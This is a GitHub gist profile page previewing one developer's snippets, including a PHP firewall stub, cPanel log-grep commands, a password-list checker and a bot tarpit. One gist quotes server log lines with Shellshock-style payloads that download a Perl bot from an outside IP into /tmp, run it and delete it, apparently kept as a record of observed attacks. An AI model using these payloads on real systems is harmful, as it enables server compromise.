Skip to content

Instantly share code, notes, and snippets.

View dhaupin's full-sized avatar

dhaupin

6 followers · 0 following
View GitHub Profile
@dhaupin
dhaupin / dev_script_simple_web_app_firewall.php
Last active April 21, 2022 18:20
Function - WAF - Look for common injection, traversal, or escalation hits, then init an action
<?php
// @@TODO@@ classify this as a pub pre-controller
// @@TODO@@ semicolin var, might help edge \xYZ style hexors -- might affect speed though
// @@TOTO@@ make vars to turn on blocking of common WP and enterprise requests
// @@TODO@@ make modes to check in user agent, referrer, post, headers
// @@TODO@@ mode for strict validation of IP in addr + forwarder style headers
// @@TODO@@ testing mode (still allows traffic)
// @@TODO@@ log wrapper and modes
@dhaupin
dhaupin / DUMP_perlbot.txt
Created July 12, 2016 15:52
Rando example of CVE-2016-4971
# http://31.220.3.180/mox
#/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://31.220.3.180/g.pl;curl -O http://31.220.3.180/g.pl;wget http://31.220.3.180/g.pl;perl /tmp/g.pl*;perl g.pl;rm -rf /tmp/g.pl*\""
#/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [27/May/2016:08:09:12 -0400] "GET /bashh HTTP/1.0" 404 1984 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://31.220.3.180/mox;curl -O http://31.220.3.180/mox;wget http://31.220.3.180/mox;perl /tmp/mox*;perl mox;rm -rf /tmp/mox*\""
##############################################################################
#!/usr/bin/perl
# ------------------------------------------------------------- #
@dhaupin
dhaupin / DUMP_shell_commands.txt
Last active October 27, 2017 07:58
Rando Shell Commands for cPanel Servers
##################
# Logs #
##################
# Look through syslogs, ignore local, ignore SSL fails, ignore whitelist ip
grep -Ev --color=always '(127.0.0.1|10.30.9.*|209.203.197.*|socket\ failed)' /var/log/messages /var/log/secure | less -R
# Look through IP domlogs, ignore local, ignore whitelist ip, ignore bots, ignore controlscan
grep -sh --color=always "Sep/2016" /usr/local/apache/domlogs/{50.28.34.226,206.196.110.58} | grep -Ev '(LiquidWeb|nagios|209.203.197.*|Google|bing|Baidu|Netcraft|majestic12|207.198.99*)' | less -R
@dhaupin
dhaupin / dev_script_ui_breakpoint_listener.css
Last active December 2, 2019 03:16
Function - Listen for changes in CSS media breakpoints - append UI attribs to <html>
/* UI Breakpoint Listener
* Requires underscore/lodash for _debounce
*/
body:after {
content: 'widescreen';
display: none;
}
@media screen and (max-width: 1024px){
body:after {
@dhaupin
dhaupin / dev_script_chk_common_passwords.php
Last active March 11, 2016 01:10
Function - Parse list of 10,000 most used passwords and return JSON or Object match for use on account validation
<?php
// This is part of a form class, this function shalt also be available via route with optional ?search= param
// password list: https://github.com/danielmiessler/SecLists/blob/master/Passwords/10_million_password_list_top_10000.txt
// example: www.example.com/chkpw.php&search=dra would return "dragon" (always returns the first pass found)
public function chkpass($password = false, $json = true) {
$pool = $output = array();
$pool = file('https://src.creadev.org/apps/pwlist/pwlist.txt', FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES);
@dhaupin
dhaupin / dev_script_x_debugger_logger.php
Last active April 28, 2017 17:09
Function - print_r() and trace using x_r() wrapper with optional JS console.dir() or clean exit(). Additional x_dump() simple file dump.
<?php
// Exits with a print_r and call trace for debugging
// $hidden inits array output into browser console
// Backtrace: jurchiks101 at gmail dot com - http://php.net/manual/en/function.debug-backtrace.php#112238
if (!function_exists('x_r')) {
function x_r($obj, $exit = true, $return = true, $hidden = false, $console_msg = '') {
// include a debug call trace
$e = new Exception();
@dhaupin
dhaupin / dev_script_google_merch_taxonomy.php
Last active September 12, 2021 09:26
Function - Parse Google merchant center shopping categories into Array or JSON - works with search url param or direct category_id argument
<?php
// This is part of a product class, this function shalt also be available via route with optional ?search= param
// $this->request->get is platform specific, change it to whatever your request wrapper uses
public function googlecats($cat_ids = false) {
// default format
$json = true;
@dhaupin
dhaupin / dev_script_bot_tarpit.php
Last active December 12, 2022 03:19
Function - Bot honeypot + timewaster tarpit + Fail2Ban
<?php
// Dribbler Tarbaby Community v.0.1.0 - Copyright 2013-2014 under GNU/GPL
// Original script by Mike ([email protected])
// http://www.stopforumspam.com/forum/viewtopic.php?pid=41173
//
// Contributors:
// John Darkhorse
// Derek Haupin ([email protected])
//
// @@ WARNING @@
@dhaupin
dhaupin / dev_script_logger_console_sys.php
Last active March 4, 2016 16:31
Function - Send debug logs to browser console and/or system log (var/log/messages)
<?php
// This goes in your log class, for this example we will access it in the view as $this->log->consoled
// These call a native platform log method, for this example we will call it $this->write()
public function syslog($message, $errlog = false) {
syslog(LOG_NOTICE, 'debug: (' . $_SERVER['SERVER_NAME'] . '@' . $_SERVER['SERVER_ADDR'] . ') [INFO] ' . $this->clean($message));
if ($errlog) {
$this->write('@System | ' . $message);
@dhaupin
dhaupin / dev_script_asset_cachebuster.php
Last active November 10, 2016 19:51
Function - Cachebuster - Add timestamp to assets in order to break out of browser caching
<?php
if (!function_exists('addTimestamp')) {
function addTimestamp($src, $remote = false, $man_v = '') {
if (empty($src)) {
return;
} elseif ($_SERVER['HTTP_HOST'] === $_SERVER['SERVER_NAME']) {
$local_root = $_SERVER['DOCUMENT_ROOT'] . '/';
preg_match('/^([https]+:)?\/\//', $src, $src_proto);